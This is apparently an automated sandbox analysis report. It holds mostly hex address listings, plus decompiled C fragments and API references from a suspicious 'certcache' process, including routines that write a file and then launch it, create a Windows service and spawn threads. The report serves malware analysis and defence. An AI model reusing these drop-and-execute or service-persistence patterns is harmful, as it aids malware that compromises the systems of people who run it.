0x001349fb
0x001349ff
0x00134b9c
0x00134bb3
0x00134bbb
0x00134bc2
0x00134bda
0x00134be1
0x00134c0a
0x00134c10
0x00134c13
0x00134c16
0x00134bc4
0x00134bca
0x00134bd5
0x00134bd5
0x00134c1f
0x00134c28
0x00134c2a
0x00134c33
0x00134c36
0x00134c38
0x00000000
0x00134c3e
0x00134c48
0x00134c4b
0x00134c4e
0x00134c55
0x00134c5c
0x00134d4a
0x00134d50
0x00134d53
0x00134d59
0x00134d87
0x00134d93
0x00134d96
0x00134d9f
0x00134dac
0x00134daf
0x00134da1
0x00134da1
0x00134da4
0x00134da4
0x00134dc1
0x00134e3f
0x00134f16
0x00000000
0x00134e51
0x00134e5a
0x00134e60
0x00134e79
0x00134e95
0x00134e9b
0x00134e9e
0x00134ea4
0x00134ea7
0x00134eaa
0x00134ead
0x00134eb8
0x00134ebb
0x00134ec2
0x00134f16
0x00000000
0x00134f1b
0x00134f2f
0x00134f4b
0x00134f65
0x00134f6b
0x00134f6e
0x00134f77
0x00134f7d
0x00134f80
0x00134f83
0x00134f8d
0x00134f9f
0x00134fa8
0x00134faf
0x00134fca
0x00134fca
0x00134fd0
0x00134fd3
0x00134fd3
0x00134ec4
0x00134ec8
0x00134eda
0x00134ee3
0x00134eea
0x00134f02
0x00134f05
0x00134f05
0x00134f0e
0x00134f0e
0x00134f11
0x00000000
0x00134ec2
0x00135298
0x0013529c
0x001352ae
0x001352b6
0x001352b7
0x001352bd
0x001352c9
0x001352d0
0x001352db
0x001352e3
0x001352f6
0x001352fe
0x00135310
0x0013531c
0x0013531f
0x0013532c
0x0013532c
0x0013532e
0x00135334
0x00135341
0x00135365
0x0013538c
0x00135395
0x001353aa
0x001353b3
0x001353c7
0x001353d0
0x001353e5
0x001353ee
0x00135403
0x0013540c
0x00135421
0x0013542a
0x0013543f
0x00135448
0x0013545d
0x00135466
0x00135353
0x00135356
0x0013535f
0x00135362
0x00135362
0x0013547f
0x0013547f
0x0013548b
0x00000000
0x00000000
0x00135496
0x0013549f
0x001354a8
0x00135476
0x00135479
0x00135479
0x001354ad
0x001354b2
0x001354b3
0x001354b4
0x001354b5
0x001354b6
0x001354b9
0x001354bc
0x001354c6
0x001354c8
0x001354d1
0x001354d7
0x001354dd
0x001354dd
0x001354f2
0x001354f5
0x001354f8
0x001354ff
0x00135509
0x0013550e
0x00135515
0x00135517
0x00135517
0x00135515
0x001354ff
0x0013551e
0x00000000
0x00000000
0x00000000
0x00000000
0x00134d5b
0x00134d5e
0x00134d61
0x00000000
0x00134d63
0x00134d63
0x00134d63
0x00134d6a
0x00134d6d
0x0013527d
0x00134d61
0x00134c62
0x00134c62
0x00134c62
0x00134c68
0x00134d0c
0x00134d0c
0x00134d11
0x00134d12
0x00134d13
0x00134d1c
0x00134d2a
0x00134d33
0x00134d36
0x00134d38
0x00000000
0x00134d3e
0x00134d41
0x00134d47
0x00000000
0x00134d47
0x00134c6e
0x00134c6e
0x00134c6e
0x00134c74
0x00134cd3
0x00134cdf
0x00000000
0x00134c76
0x00134c76
0x00134c79
0x00134c7c
0x00134cbd
0x00134ccb
0x00134ce2
0x00134ce4
0x00000000
0x00134ce6
0x00134cf1
0x00134cf4
0x00134cfd
0x00134d00
0x00134d06
0x00000000
0x00000000
0x00000000
0x00000000
0x00134d06
0x00134c7e
0x00134c7e
0x00134c7e
0x00134c85
0x00134c88
0x0013527f
0x00134c7c
0x00134c74
0x00134c68
0x00134c5c
0x00134a05
0x00134a08
0x00134a0e
0x00134b80
0x00134b87
0x00134b90
0x00134b99
0x00000000
0x00134a14
0x00134a14
0x00134a2c
0x00134a34
0x00134a3b
0x00134a5f
0x00000000
0x00134a61
0x00134a61
0x00134a68
0x00134a73
0x00134a87
0x00134a91
0x00134a9a
0x00134aa1
0x00000000
0x00000000
0x00000000
0x00134aa3
0x00134aa6
0x00134aa9
0x00134ab2
0x00000000
0x00134ab4
0x00000000
0x00134ab4
0x00134ab2
0x00134a3d
0x00134a43
0x00134a4a
0x00134ab9
0x00134ab9
0x00134abf
0x00134b1e
0x00134b2a
0x00000000
0x00134ac1
0x00134ac1
0x00134ac4
0x00134ac7
0x00134b08
0x00134b16
0x00134b2d
0x00134b2f
0x00000000
0x00134b31
0x00134b3c
0x00134b3f
0x00134b45
0x00134b48
0x00134b4f
0x00000000
0x00000000
0x00000000
0x00000000
0x00134b4f
0x00134ac9
0x00134ac9
0x00134ac9
0x00134ad0
0x00134ad3
0x00135281
0x00134ac7
0x00134a54
0x00134b55
0x00000000
0x00134b55
0x00134a4a
0x00134a3b
0x00134a0e
0x00134913
0x00134913
0x00134919
0x001349bd
0x001349bd
0x001349c2
0x001349c3
0x001349c4
0x001349cd
0x001349db
0x001349e1
0x001349e4
0x001349e7
0x001349e9
0x00000000
0x001349ef
0x001349f2
0x001349f8
0x00000000
0x001349f8
0x0013491f
0x0013491f
0x0013491f
0x00134925
0x00134984
0x00134990
0x00000000
0x00134927
0x00134927
0x0013492a
0x0013492d
0x0013496e
0x0013497c
0x00134993
0x00134995
0x00000000
0x00134997
0x001349a2
0x001349a5
0x001349ae
0x001349b1
0x001349b7
0x00000000
0x00000000
0x00000000
0x00000000
0x001349b7
0x0013492f
0x0013492f
0x0013492f
0x00134936
0x00134939
0x00135283
0x0013492d
0x00134925
0x00134919
0x001348ea
0x00134fdb
0x00134fe1
0x00134fe4
0x00133184
0x00133188
0x0013322a
0x00133233
0x0013323c
0x00133245
0x0013324a
0x00000000
0x00133250
0x0013325b
0x0013325e
0x00133265
0x001337d5
0x001337dc
0x0013380e
0x00133913
0x00133925
0x00133929
0x00133a57
0x00133a5c
0x00133a5d
0x00133a5e
0x00133a5f
0x00133a60
0x00133a61
0x00133a62
0x00133a6c
0x00133a7b
0x00133a7d
0x00133a80
0x00133a92
0x00133a99
0x00133aa3
0x00133ba5
0x00000000
0x00133aa9
0x00133aa9
0x00133aad
0x00133b4f
0x00133b55
0x00133b5e
0x00133b61
0x00133b6a
0x00133b6f
0x00000000
0x00133b75
0x00133b8d
0x00133b93
0x00133a8f
0x00000000
0x00133a8f
0x00133ab3
0x00133ab3
0x00133ab3
0x00133ab9
0x00133b18
0x00133b24
0x00000000
0x00133abb
0x00133abb
0x00133abe
0x00133ac1
0x00133b02
0x00133b10
0x00133b27
0x00133b29
0x00000000
0x00133b2b
0x00133b39
0x00133b42
0x00133b49
0x00000000
0x00000000
0x00000000
0x00000000
0x00133b49
0x00133ac3
0x00133ac3
0x00133ac3
0x00133aca
0x00133acd
0x00133acd
0x00133ac1
0x00133ab9
0x00133aad
0x0013392f
0x0013392f
0x00133932
0x0013393c
0x001339e7
0x001339ea
0x00133a04
0x00133a0b
0x00133a17
0x00133a1d
0x00133a1d
0x00133a27
0x00133a29
0x00133a2e
0x00000000
0x00133a34
0x00133a34
0x00133a39
0x00133a48
0x00133a4e
0x00133922
0x00000000
0x00133922
0x00133942
0x00133942
0x00133942
0x00133948
0x001339a7
0x001339b3
0x00000000
0x0013394a
0x0013394a
0x0013394d
0x00133950
0x00133991
0x0013399f
0x001339b6
0x001339b8
0x00000000
0x001339ba
0x001339c8
0x001339d1
0x001339d7
0x001339e1
0x00000000
0x00000000
0x00000000
0x00000000
0x001339e1
0x00133952
0x00133952
0x00133952
0x00133959
0x0013395c
0x0013395c
0x00133950
0x00133948
0x0013393c
0x00133814
0x00133823
0x00133831
0x00133844
0x0013384c
0x0013384e
0x0013385f
0x00133868
0x0013386e
0x00133870
0x00133873
0x00133885
0x00133891
0x00133897
0x0013389a
0x00133882
0x00133882
0x001338aa
0x001338b6
0x001338bc
0x001338bf
0x001338a7
0x001338a7
0x001338cf
0x001338db
0x001338e1
0x001338e4
0x001338cc
0x001338cc
0x001338f4
0x00133900
0x00133906
0x00133909
0x001338f1
0x001338f1
0x00133bad
0x00133bbe
0x00133bc5
0x00000000
0x00133bcb
0x00133bdc
0x00133bdf
0x00133be1
0x00133be9
0x00133bf8
0x00133bfd
0x00133c02
0x00133c0d
0x00133c1c
0x00133c21
0x00133c26
0x00133c31
0x00133c40
0x00133c42
0x00133c45
0x00133c57
0x00133c85
0x00133c54
0x00133c54
0x00133c8e
0x00133c98
0x00133ca7
0x00133caa
0x00133cba
0x00133cbd
0x00133cc8
0x00133cda
0x00133cf0
0x00133d08
0x00133d0e
0x00133d17
0x00133cd4
0x00133cd7
0x00133cd7
0x00133d2a
0x00133d59
0x00133d60
0x00133d72
0x00133d7b
0x00133d82
0x00000000
0x00000000
0x00133d88
0x00133d98
0x00133d9f
0x00133dad
0x00133dbd
0x00133dc3
0x00133dca
0x00133dcd
0x00133df2
0x00133e09
0x00133e0b
0x00133ddb
0x00133dde
0x00133dec
0x00133dec
0x00133e14
0x00133e6e
0x00133e75
0x00133e86
0x00133e91
0x00133e9a
0x00133e9a
0x00133ea3
0x00133ea9
0x00133ec0
0x00133ece
0x00133edc
0x00133ef1
0x00133f28
0x00133ef3
0x00133eff
0x00133f0a
0x00133f13
0x00133f13
0x00133eba
0x00133eba
0x00133f32
0x00133f40
0x00133f4f
0x00133e16
0x00133e1f
0x00133e26
0x00133e2f
0x00133e34
0x00133e3c
0x00133e49
0x00133e4e
0x00133e51
0x00133e51
0x00133e56
0x00000000
0x00133da1
0x00133d69
0x00133d6f
0x00000000
0x00133d6f
0x00000000
0x00133d9f
0x00133f63
0x0013445e
0x00133bb5
0x00133bbb
0x00000000
0x00133f69
0x00133f69
0x00133f70
0x00133f87
0x00133f8a
0x00133f91
0x0013439a
0x001343a4
0x001343a7
0x001343ae
0x001343e3
0x001343ed
0x001343fd
0x0013440c
0x00134420
0x0013443a
0x0013444a
0x00134459
0x0013445b
0x00000000
0x001343b0
0x001343b0
0x001343b0
0x001343b7
0x001343ba
0x00135289
0x00133f97
0x00133f97
0x00133f9b
0x00134136
0x0013414c
0x00134154
0x0013415b
0x00134173
0x0013417a
0x001341a2
0x001341a8
0x001341ab
0x001341ae
0x0013415d
0x00134163
0x0013416e
0x0013416e
0x001341b7
0x001341c0
0x001341c2
0x001341c8
0x001341cb
0x001341ce
0x001341d0
0x00000000
0x001341d6
0x001341da
0x001341fd
0x00134229
0x0013422c
0x0013422c
0x00134233
0x00134236
0x0013423c
0x001342e0
0x001342e0
0x001342e5
0x001342e6
0x001342e7
0x001342f0
0x001342fe
0x00134304
0x00134307
0x0013430a
0x0013430c
0x00000000
0x00134312
0x00134322
0x0013432c
0x00134343
0x0013432e
0x0013433b
0x0013433b
0x00134353
0x0013435a
0x00134368
0x0013436e
0x00134377
0x00134379
0x00134385
0x00000000
0x00134385
0x00134242
0x00134242
0x00134242
0x00134248
0x001342a7
0x001342b3
0x00000000
0x0013424a
0x0013424a
0x0013424d
0x00134250
0x00134291
0x0013429f
0x001342b6
0x001342b8
0x00000000
0x001342ba
0x001342c5
0x001342c8
0x001342ce
0x001342d1
0x001342da
0x00000000
0x00000000
0x00000000
0x00000000
0x001342da
0x00134252
0x00134252
0x00134252
0x00134259
0x0013425c
0x0013528b
0x00134250
0x00134248
0x00134205
0x00134205
0x00134205
0x0013420c
0x0013420f
0x0013528d
0x001341dc
0x001341e5
0x001341ee
0x001341f1
0x00000000
0x001341f1
0x001341da
0x00133fa1
0x00133faa
0x0013411a
0x00134121
0x0013412a
0x00134133
0x00000000
0x00133fb0
0x00133fb0
0x00133fc7
0x00133fcf
0x00133fd6
0x00133ffa
0x00000000
0x00133ffc
0x00133ffc
0x00134003
0x00134021
0x0013402b
0x00134031
0x00134034
0x0013403b
0x00000000
0x00000000
0x00000000
0x0013403d
0x00134040
0x00134043
0x0013404c
0x00000000
0x0013404e
0x00000000
0x0013404e
0x0013404c
0x00133fd8
0x00133fdb
0x00133fde
0x00133fe5
0x00134053
0x00134053
0x00134059
0x001340b8
0x001340c4
0x00000000
0x0013405b
0x0013405b
0x0013405e
0x00134061
0x001340a2
0x001340b0
0x001340c7
0x001340c9
0x00000000
0x001340cb
0x001340d1
0x001340d9
0x001340df
0x001340e2
0x001340e9
0x00000000
0x00000000
0x00000000
0x00000000
0x001340e9
0x00134063
0x00134063
0x00134063
0x0013406a
0x0013406d
0x0013528f
0x00134061
0x00133fef
0x001340ef
0x00000000
0x001340ef
0x00133fe5
0x00133fd6
0x00133faa
0x00133f9b
0x00133f91
0x00133d35
0x00133d35
0x00133d35
0x00133d3c
0x00133d3f
0x00133d3f
0x00133d2a
0x00133bc5
0x001337de
0x001337de
0x001337de
0x001337e5
0x001337e8
0x001337e8
0x0013326b
0x0013326b
0x00133274
0x0013331b
0x00133326
0x0013332c
0x00133334
0x00133339
0x00000000
0x0013333f
0x0013333f
0x00133351
0x00133355
0x001334f8
0x00133515
0x00133520
0x0013352e
0x00133554
0x00133558
0x0013367b
0x0013367f
0x00000000
0x00133685
0x00133685
0x00133685
0x0013368b
0x001336ad
0x001336ad
0x001336b3
0x00133711
0x00133727
0x00133713
0x00133719
0x00133719
0x00133736
0x00133773
0x00133738
0x00133746
0x0013375c
0x00133748
0x0013374e
0x0013374e
0x00133768
0x00133768
0x0013377f
0x0013378b
0x0013378f
0x00133793
0x001337a2
0x001337a4
0x001337b0
0x001337b6
0x001337bc
0x001337c8
0x00000000
0x001336b5
0x001336b8
0x001336bb
0x001336dd
0x001336dd
0x001336e4
0x001336e7
0x001336bd
0x001336bd
0x001336bd
0x001336c4
0x001336c7
0x001336c7
0x001336bb
0x0013368d
0x0013368d
0x0013368d
0x00133694
0x00133697
0x00133697
0x0013368b
0x00133568
0x00133568
0x0013356c
0x0013360e
0x00133617
0x00133620
0x00133629
0x0013362c
0x0013362e
0x00000000
0x00133634
0x00133634
0x00133634
0x0013363a
0x00133662
0x0013366a
0x00133670
0x00133673
0x00000000
0x0013363c
0x0013363c
0x0013363c
0x00133643
0x00133646
0x00133646
0x0013363a
0x00133572
0x00133572
0x00133572
0x00133578
0x001335d7
0x001335e3
0x00000000
0x0013357a
0x0013357a
0x0013357d
0x00133580
0x001335c1
0x001335cf
0x001335e6
0x001335e8
0x00000000
0x001335ea
0x001335f8
0x00133601
0x00133608
0x00000000
0x00000000
0x00000000
0x00000000
0x00133608
0x00133582
0x00133582
0x00133582
0x00133589
0x0013358c
0x0013358c
0x00133580
0x00133578
0x0013356c
0x00133530
0x00133530
0x00133530
0x00133537
0x0013353a
0x0013353a
0x0013335b
0x0013335f
0x0013343f
0x0013343f
0x00133445
0x001334b1
0x001334bd
0x00000000
0x00133447
0x00133447
0x0013344a
0x0013344d
0x00133499
0x001334a4
0x001334c0
0x001334c2
0x00000000
0x00000000
0x00000000
0x00000000
0x0013344f
0x0013344f
0x0013344f
0x00133456
0x00133459
0x00133459
0x0013344d
0x00133365
0x00133365
0x00133369
0x0013340b
0x0013341a
0x00133426
0x0013342f
0x00133434
0x00000000
0x0013343a
0x001334c8
0x0013334b
0x0013334e
0x00000000
0x0013334e
0x0013336f
0x0013336f
0x0013336f
0x00133375
0x001333d4
0x001333e0
0x00000000
0x00133377
0x00133377
0x0013337a
0x0013337d
0x001333be
0x001333cc
0x001333e3
0x001333e5
0x00000000
0x001333e7
0x001333f5
0x001333fe
0x00133405
0x00000000
0x00000000
0x00000000
0x00000000
0x00133405
0x0013337f
0x0013337f
0x0013337f
0x00133386
0x00133389
0x00133389
0x0013337d
0x00133375
0x00133369
0x0013335f
0x00133355
0x0013327a
0x0013327a
0x0013327a
0x00133280
0x001332df
0x001332eb
0x00000000
0x00133282
0x00133282
0x00133285
0x00133288
0x001332c9
0x001332d7
0x001332ee
0x001332f0
0x00000000
0x001332f2
0x00133300
0x00133309
0x00133315
0x00000000
0x00000000
0x00000000
0x00000000
0x00133315
0x0013328a
0x0013328a
0x0013328a
0x00133291
0x00133294
0x00133294
0x00133288
0x00133280
0x00133274
0x00133265
0x0013318e
0x0013318e
0x0013318e
0x00133194
0x001331f3
0x001331ff
0x00000000
0x00133196
0x00133196
0x00133199
0x0013319c
0x001331dd
0x001331eb
0x00133202
0x00133204
0x00000000
0x00133206
0x00133214
0x0013321d
0x00133224
0x00000000
0x00000000
0x00000000
0x00000000
0x00133224
0x0013319e
0x0013319e
0x0013319e
0x001331a5
0x001331a8
0x001331a8
0x0013319c
0x00133194
0x00134fea
0x00134fed
0x00134ff0
0x00135253
0x00135253
0x0013525a
0x0013525d
0x00134ff6
0x00134ff6
0x00134fff
0x001350a6
0x001350b1
0x001350b7
0x001350bf
0x001350c2
0x001350c4
0x00000000
0x001350ca
0x001350ca
0x001350dc
0x001350e0
0x00000000
0x001350e6
0x001350ea
0x001351c1
0x001351c1
0x001351c7
0x00135226
0x00135232
0x00000000
0x001351c9
0x001351c9
0x001351cc
0x001351cf
0x00135210
0x0013521e
0x00135235
0x00135237
0x00000000
0x00000000
0x00000000
0x00000000
0x001351d1
0x001351d1
0x001351d1
0x001351d8
0x001351db
0x00135275
0x001351cf
0x001350f0
0x001350f0
0x001350f4
0x00135196
0x0013519f
0x001351ab
0x001351b4
0x001351b9
0x00000000
0x001351bf
0x00135239
0x00135242
0x0013524b
0x001350d6
0x001350d9
0x00000000
0x001350d9
0x001350fa
0x001350fa
0x001350fa
0x00135100
0x0013515f
0x0013516b
0x00000000
0x00135102
0x00135102
0x00135105
0x00135108
0x00135149
0x00135157
0x0013516e
0x00135170
0x00000000
0x00135172
0x00135180
0x00135189
0x00135190
0x00000000
0x00000000
0x00000000
0x00000000
0x00135190
0x0013510a
0x0013510a
0x0013510a
0x00135111
0x00135114
0x00135277
0x00135108
0x00135100
0x001350f4
0x001350ea
0x001350e0
0x00135005
0x00135005
0x00135005
0x0013500b
0x0013506a
0x00135076
0x00000000
0x0013500d
0x0013500d
0x00135010
0x00135013
0x00135054
0x00135062
0x00135079
0x0013507b
0x00000000
0x0013507d
0x0013508b
0x00135094
0x001350a0
0x00000000
0x00000000
0x00000000
0x00000000
0x001350a0
0x00135015
0x00135015
0x00135015
0x0013501c
0x0013501f
0x00135279
0x00135013
0x0013500b
0x00134fff
0x00134ff0
0x00134fe4
0x001348e8
0x00000000
0x00000000
0x00000000
0x00134477
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00134de4
0x00000000
0x00000000
0x00000000
0x00000000
0x00132f58
0x00135291
0x00135291
0x00135296
0x00135297
0x00000000
0x00135297
0x00135521
0x00135525

Strings

5, xrefs: 00132F3E

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001397B3, Relevance: 1.5, APIs: 1, Instructions: 28

APIs

CreateServiceW.ADVAPI32 ref: 001397C8

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00131BE0, Relevance: .0, Instructions: 38

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 00139AF1, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58

APIs

memset.NTDLL ref: 00139AF9
memset.NTDLL ref: 00139B07
GetLastError.KERNEL32 ref: 00139B28
GetTickCount.KERNEL32 ref: 00139B37
_snwprintf.NTDLL ref: 00139B8E
GetProcessHeap.KERNEL32(00000000,?), ref: 00139B9A
HeapFree.KERNEL32(00000000), ref: 00139BA1
GetLastError.KERNEL32 ref: 00139BB8

Strings

D, xrefs: 00139B10
C:\Windows\SysWOW64, xrefs: 00139B7C

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013A658, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 42
processfile

C-Code - Quality: 56%

			E0013A658() {
				void* _t22;
				void* _t24;
				void* _t26;

				WriteFile();
				CloseHandle(_t24);
				memset(_t26 - 0x5c, 0, 0x44);
				 *(_t26 - 0x5c) = 0x44;
				if(CreateProcessW(_t26 - 0x320, 0, 0, 0, 0, 0, 0, 0, _t26 - 0x5c, _t26 - 0x18) != 0) {
					CloseHandle( *(_t26 - 0x18));
					_push( *((intOrPtr*)(_t26 - 0x14)));
					CloseHandle();
				}
				HeapFree(GetProcessHeap(), 0, _t22);
				return 0;
			}

0x0013a658
0x0013a65f
0x0013a66d
0x0013a676
0x0013a6a2
0x0013a6a7
0x0013a6ad
0x0013a6b0
0x0013a6b0
0x0013a6c0
0x0013a6ce

APIs

WriteFile.KERNEL32 ref: 0013A658
CloseHandle.KERNEL32 ref: 0013A65F
memset.NTDLL ref: 0013A66D
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0013A69A
CloseHandle.KERNEL32(?), ref: 0013A6A7
CloseHandle.KERNEL32(?), ref: 0013A6B0
GetProcessHeap.KERNEL32(00000000), ref: 0013A6B9
HeapFree.KERNEL32(00000000), ref: 0013A6C0

Strings

D, xrefs: 0013A676

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013A6E0, Relevance: 15.1, APIs: 10, Instructions: 65
thread

C-Code - Quality: 100%

			E0013A6E0(void* __ecx) {
				void* _t15;
				void* _t22;
				void _t25;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t33;

				_t31 = __ecx;
				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
				_t33 = _t15;
				if(_t33 == 0) {
					return _t15;
				} else {
					 *_t33 =  *_t31;
					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
					_t4 = _t33 + 0x10; // 0x10
					_t29 = _t4;
					 *(_t33 + 8) = _t29;
					 *(_t33 + 0xc) =  *(_t31 + 0xc);
					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
					if(_t32 == 0) {
						L5:
						return HeapFree(GetProcessHeap(), 0, _t33);
					}
					 *(_t32 + 4) =  *_t33;
					_t22 = CreateThread(0, 0, 0x13a3f0, _t33, 0, 0);
					 *(_t32 + 8) = _t22;
					if(_t22 == 0) {
						HeapFree(GetProcessHeap(), 0, _t32);
						goto L5;
					}
					_t25 =  *0x13cbd4; // 0x0
					 *_t32 = _t25;
					 *0x13cbd4 = _t32;
					return _t25;
				}
			}

0x0013a6e2
0x0013a6f4
0x0013a6fa
0x0013a6fe
0x0013a793
0x0013a704
0x0013a706
0x0013a70b
0x0013a70e
0x0013a70e
0x0013a711
0x0013a717
0x0013a721
0x0013a73b
0x0013a73f
0x0013a781
0x00000000
0x0013a78b
0x0013a751
0x0013a754
0x0013a75a
0x0013a75f
0x0013a77b
0x00000000
0x0013a77b
0x0013a761
0x0013a766
0x0013a768
0x0013a770
0x0013a770

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0013A6ED
RtlAllocateHeap.NTDLL(00000000), ref: 0013A6F4
memcpy.NTDLL(00000010,?,?), ref: 0013A721
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0013A72E
RtlAllocateHeap.NTDLL(00000000), ref: 0013A735
CreateThread.KERNEL32(00000000,00000000,Function_0000A3F0,00000000,00000000,00000000), ref: 0013A754
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0013A774
HeapFree.KERNEL32(00000000), ref: 0013A77B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0013A784
HeapFree.KERNEL32(00000000), ref: 0013A78B

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013A515, Relevance: 15.0, APIs: 10, Instructions: 50
file

C-Code - Quality: 26%

			E0013A515(void* __edi, void* __eflags) {
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t37;

				_t32 = __edi;
				WriteFile(??, ??, ??, ??, ??);
				CloseHandle(_t34);
				L00131830(0x131398, 4);
				_t35 =  *(_t37 - 4);
				 *0x13c20c(_t37 - 0x528, 0x104, _t35, _t37 - 0x320, 0x6e15c1da, _t37 - 4);
				HeapFree(GetProcessHeap(), 0, _t35);
				_push(_t37 - 0x18);
				_push( *((intOrPtr*)(_t37 + 8)));
				if(L001321B0(_t37 - 0x528, _t32) != 0) {
					CloseHandle( *(_t37 - 0x18));
					CloseHandle( *(_t37 - 0x14));
				}
				_push( *((intOrPtr*)(_t37 + 8)));
				CloseHandle();
				HeapFree(GetProcessHeap(), 0, _t32);
				return 0;
			}

0x0013a515
0x0013a515
0x0013a51c
0x0013a535
0x0013a53a
0x0013a551
0x0013a564
0x0013a56d
0x0013a56e
0x0013a581
0x0013a586
0x0013a58f
0x0013a58f
0x0013a595
0x0013a6b0
0x0013a6c0
0x0013a6ce

APIs

WriteFile.KERNEL32 ref: 0013A515
CloseHandle.KERNEL32 ref: 0013A51C
_snwprintf.NTDLL ref: 0013A551
GetProcessHeap.KERNEL32(00000000,?), ref: 0013A55D
HeapFree.KERNEL32(00000000), ref: 0013A564
CloseHandle.KERNEL32(?), ref: 0013A586
CloseHandle.KERNEL32(?), ref: 0013A58F
CloseHandle.KERNEL32(?), ref: 0013A6B0
GetProcessHeap.KERNEL32(00000000), ref: 0013A6B9
HeapFree.KERNEL32(00000000), ref: 0013A6C0

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 001316D3, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 38
process

C-Code - Quality: 45%

			E001316D3() {
				void* __edi;
				void* __esi;
				int _t12;
				void* _t13;

				memset();
				 *(_t13 - 0x58) = 0x44;
				 *((intOrPtr*)(_t13 - 0x2c)) = 0x80;
				_t12 = CreateProcessW(_t13 - 0x360, 0, 0, 0, 0, 0, 0, 0, _t13 - 0x58, _t13 - 0x14);
				if(_t12 == 0) {
					goto 0x140044;
					asm("int3");
					asm("int3");
					return _t12;
				} else {
					WaitForSingleObject(__esi, 0xffffffff);
					CloseHandle( *(__ebp - 0x14));
					CloseHandle( *(__ebp - 0x10));
					CloseHandle(__esi);
					CloseHandle(__edi);
					_pop(__edi);
					_pop(__esi);
					_pop(__ebp);
					return 1;
				}
			}

0x001316d3
0x001316dc
0x001316e6
0x00131707
0x0013170f
0x00131691
0x00131696
0x00131697
0x00131698
0x00131711
0x00131714
0x0013171d
0x00131726
0x0013172d
0x00131734
0x0013173a
0x00131740
0x00131743
0x00131744
0x00131744

APIs

memset.NTDLL ref: 001316D3
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00131707
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00131714
CloseHandle.KERNEL32(?), ref: 0013171D
CloseHandle.KERNEL32(?), ref: 00131726
CloseHandle.KERNEL32 ref: 0013172D
CloseHandle.KERNEL32 ref: 00131734

Strings

D, xrefs: 001316DC

Memory Dump Source

Source File: 00000004.00000002.729864944.0000000000131000.00000020.sdmp, Offset: 00130000, based on PE: true

Associated: 00000004.00000002.729855533.0000000000130000.00000002.sdmp
Associated: 00000004.00000002.729886085.000000000013B000.00000002.sdmp
Associated: 00000004.00000002.729895336.000000000013C000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_130000_certcache.jbxd

Function 0013A402, Relevance: 13.6, APIs: 9, Instructions: 76

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 0013A420
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0013A5B5
GetTickCount.KERNEL32 ref: 0013A5BB
_snwprintf.NTDLL ref: 0013A60E
GetProcessHeap.KERNEL32(00000000,?), ref: 0013A61A
HeapFree.KERNEL32(00000000), ref: 0013A621
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0013A640
